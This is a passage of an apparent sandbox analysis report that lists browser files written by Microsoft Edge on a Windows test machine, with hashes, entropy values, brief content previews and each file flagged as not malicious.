                                                                                                                                                                                                                                                                                    Preview:...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340900604462938.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):336
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.071749848738965
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:EI8Vq2P923oH+Tcwt9Eh1tIFUt8VIEkgZmw+VIE0IkwO923oH+Tcwt9Eh15LJ:F8Vv4Yeb9Eh16FUt8ahg/+abI5LYeb9O
                                                                                                                                                                                                                                                                                    MD5:2998299E421B5061BB3DC5F4631D12C4
                                                                                                                                                                                                                                                                                    SHA1:CFDC2EF248FDEEAF60098426CFCCC6528275BEA4
                                                                                                                                                                                                                                                                                    SHA-256:3BA1154495D42E213ED82E051A2C55EA3535ED801D08B10E70B26D7B7C27FA4A
                                                                                                                                                                                                                                                                                    SHA-512:A3D2E2C26AEA9D7795644BFB441155471911FA92BF12D1B1E0787DBCBA272779BC78FCB6CBE95FA84B7D518D486D12F48F30CAE07E2D742A54FEF4AD3B70306B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:52.406 2024 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/23-00:57:52.407 2024 Recovering log #3.2024/12/23-00:57:52.412 2024 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):336
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.071749848738965
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:EI8Vq2P923oH+Tcwt9Eh1tIFUt8VIEkgZmw+VIE0IkwO923oH+Tcwt9Eh15LJ:F8Vv4Yeb9Eh16FUt8ahg/+abI5LYeb9O
                                                                                                                                                                                                                                                                                    MD5:2998299E421B5061BB3DC5F4631D12C4
                                                                                                                                                                                                                                                                                    SHA1:CFDC2EF248FDEEAF60098426CFCCC6528275BEA4
                                                                                                                                                                                                                                                                                    SHA-256:3BA1154495D42E213ED82E051A2C55EA3535ED801D08B10E70B26D7B7C27FA4A
                                                                                                                                                                                                                                                                                    SHA-512:A3D2E2C26AEA9D7795644BFB441155471911FA92BF12D1B1E0787DBCBA272779BC78FCB6CBE95FA84B7D518D486D12F48F30CAE07E2D742A54FEF4AD3B70306B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:52.406 2024 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/23-00:57:52.407 2024 Recovering log #3.2024/12/23-00:57:52.412 2024 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):28672
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.4632030495770934
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu9K:TouQq3qh7z3bY2LNW9WMcUvBu9K
                                                                                                                                                                                                                                                                                    MD5:F778CFA868961E093AA785965D471CD3
                                                                                                                                                                                                                                                                                    SHA1:651BE07DEB4148F58FDB8A6787B0E0F8B51522C3
                                                                                                                                                                                                                                                                                    SHA-256:8497D99C8F58ACC47C5C7E183EE28D5A517F8BD59367AAEB53925721C747092A
                                                                                                                                                                                                                                                                                    SHA-512:F5B4080B86555C77296789F3FA9CCC0EBBCDCB0DBF229BC627608993944BCF9D15FE98B43473FE386F453B10703C103D95024B9923E550ACCD4939A1F64BCB1F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):10240
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                    MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                    SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                    SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                    SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):348
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.20791529130883
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERIF4q2P923oH+TcwtnG2tMsIFUt8VRIsJZmw+VRIsDkwO923oH+TcwtnG2tMsLJ:PF4v4Yebn9GFUt8ksJ/+ksD5LYebn95J
                                                                                                                                                                                                                                                                                    MD5:8C070C4B47E3EA39607C70E709786640
                                                                                                                                                                                                                                                                                    SHA1:D7BA1087CFF24F0B4E998CA3317B2FAB0182C24D
                                                                                                                                                                                                                                                                                    SHA-256:A6F22A901586CCDD5DFC268ACBDA6CEE542328D4C9FC26D33CE6518C34927F52
                                                                                                                                                                                                                                                                                    SHA-512:EEB4EDFD4E96E88D386CFF1AA3431973009113401624A6B71EF13C000C02166F6DEC5E9A58CB58D9ADD229A83556162C004275E6DE2A554312DF0A2622E26E2C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:47.625 1ff4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/23-00:57:47.626 1ff4 Recovering log #3.2024/12/23-00:57:47.626 1ff4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):348
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.20791529130883
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERIF4q2P923oH+TcwtnG2tMsIFUt8VRIsJZmw+VRIsDkwO923oH+TcwtnG2tMsLJ:PF4v4Yebn9GFUt8ksJ/+ksD5LYebn95J
                                                                                                                                                                                                                                                                                    MD5:8C070C4B47E3EA39607C70E709786640
                                                                                                                                                                                                                                                                                    SHA1:D7BA1087CFF24F0B4E998CA3317B2FAB0182C24D
                                                                                                                                                                                                                                                                                    SHA-256:A6F22A901586CCDD5DFC268ACBDA6CEE542328D4C9FC26D33CE6518C34927F52
                                                                                                                                                                                                                                                                                    SHA-512:EEB4EDFD4E96E88D386CFF1AA3431973009113401624A6B71EF13C000C02166F6DEC5E9A58CB58D9ADD229A83556162C004275E6DE2A554312DF0A2622E26E2C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:47.625 1ff4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/23-00:57:47.626 1ff4 Recovering log #3.2024/12/23-00:57:47.626 1ff4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.6133727142136643
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jaxfypgxsmL:TO8D4jJ/6Up+A/J
                                                                                                                                                                                                                                                                                    MD5:1803DA0EF5448F480AA5E1631A6AFA85
                                                                                                                                                                                                                                                                                    SHA1:E9A77DB3F276EE54CAC9E90F5874E249206086E8
                                                                                                                                                                                                                                                                                    SHA-256:A80E5DDF60F6C9D24154D6975015873A317C27738FF2075BFE056B6199C347E6
                                                                                                                                                                                                                                                                                    SHA-512:E362670DCD4A17D61C6082C8F6930BEE740812CA87CFFF2131F68B10181EAEF5F73838CC3FDCD09FD961F037AE7668C15A6A619C050D9F6526B6EF41828A1E8B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):375520
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.354130057244226
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6144:nA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:nFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                    MD5:4A3665A5C70337B02E8E337758CB84C4
                                                                                                                                                                                                                                                                                    SHA1:B4238E1114AE18472D2D33D84B711ADFC1C27D57
                                                                                                                                                                                                                                                                                    SHA-256:6D1846E54835C002783BEECBE774D723579FA626D8B65892B7A86D064655E690
                                                                                                                                                                                                                                                                                    SHA-512:E20681FCBDC4512BD480ABD98EDF7853CA3C79C6526934FA9ACDB109444AEB944180418121F0E5F1EB0873F08BA52570D61480C8BC7FB89CA343BE046BEA952D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:...m.................DB_VERSION.1...hq...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13379407076091917..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):311
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.14190167034447
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:EIcps1923oH+Tcwtk2WwnvB2KLl+IsN1yq2P923oH+Tcwtk2WwnvIFUv:FoBYebkxwnvFLNYyv4YebkxwnQFUv
                                                                                                                                                                                                                                                                                    MD5:E1B8D45D9AAE19F02E58C7B04B701E4A
                                                                                                                                                                                                                                                                                    SHA1:3C2906E1F0CE3132EEB4798E5DB225E324A9B673
                                                                                                                                                                                                                                                                                    SHA-256:D9C3CACF4DC545A3D7256426C34FAE8A640C34427BF0EF3BC3FB133E68793E05
                                                                                                                                                                                                                                                                                    SHA-512:5A2B5A7868871B05BB2EC4737C90362E1B832AE782BC820ED66FAFE5FAC83AE5549C5B749FE00F462DC85790CA1B0CF338DCDB32EEDE8CC934896091209273D2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:52.427 20a0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/23-00:57:52.468 20a0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):358859
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.324597167497449
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RH:C1gAg1zfvv
                                                                                                                                                                                                                                                                                    MD5:47D825F34D90AD13109E1B85820F47B4
                                                                                                                                                                                                                                                                                    SHA1:36CF9BD7A884A81CF5DF1C78915C393BBB50AA2C
                                                                                                                                                                                                                                                                                    SHA-256:1F1203A041E4A2444C5D35A4A6EC0114704B850E8DAAEDD2F6C2946DE28EB3A2
                                                                                                                                                                                                                                                                                    SHA-512:37EB08DE2DC58E94776A0BFE06595ED702414BF9B38BBA9BA82C98F983AF8C0C19C76F82771EF36F7EFF2D36BF52FAA779763B7D95FD8EB809EBC5690F873C0C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):418
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                    MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                    SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                    SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                    SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.193415047825352
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERR4q2P923oH+Tcwt8aPrqIFUt8VRINNJZmw+VRINNDkwO923oH+Tcwt8amLJ:+4v4YebL3FUt8snJ/+snD5LYebQJ
                                                                                                                                                                                                                                                                                    MD5:4421138AD9E604A01667685EADD4E565
                                                                                                                                                                                                                                                                                    SHA1:E64A45A4E10267151D4220F8B0AA3460D2F8A65A
                                                                                                                                                                                                                                                                                    SHA-256:6291106D7FF573BE0552A097ACF9A1B896F7066FFF8854848C032DDF75A5E331
                                                                                                                                                                                                                                                                                    SHA-512:0E07896DA06D0D99B7AD4AF65C14AE15E19D13B68D2DC9FEB3AB4B458A6F9D7644CD4E021819AED6612C22C2C5EA19BB484965177D2EEF7147D840705F19B81D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:47.637 1ff4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/23-00:57:47.638 1ff4 Recovering log #3.2024/12/23-00:57:47.638 1ff4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.193415047825352
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERR4q2P923oH+Tcwt8aPrqIFUt8VRINNJZmw+VRINNDkwO923oH+Tcwt8amLJ:+4v4YebL3FUt8snJ/+snD5LYebQJ
                                                                                                                                                                                                                                                                                    MD5:4421138AD9E604A01667685EADD4E565
                                                                                                                                                                                                                                                                                    SHA1:E64A45A4E10267151D4220F8B0AA3460D2F8A65A
                                                                                                                                                                                                                                                                                    SHA-256:6291106D7FF573BE0552A097ACF9A1B896F7066FFF8854848C032DDF75A5E331
                                                                                                                                                                                                                                                                                    SHA-512:0E07896DA06D0D99B7AD4AF65C14AE15E19D13B68D2DC9FEB3AB4B458A6F9D7644CD4E021819AED6612C22C2C5EA19BB484965177D2EEF7147D840705F19B81D
                                                                                                                                                                                                                                                                                    Malicious:false
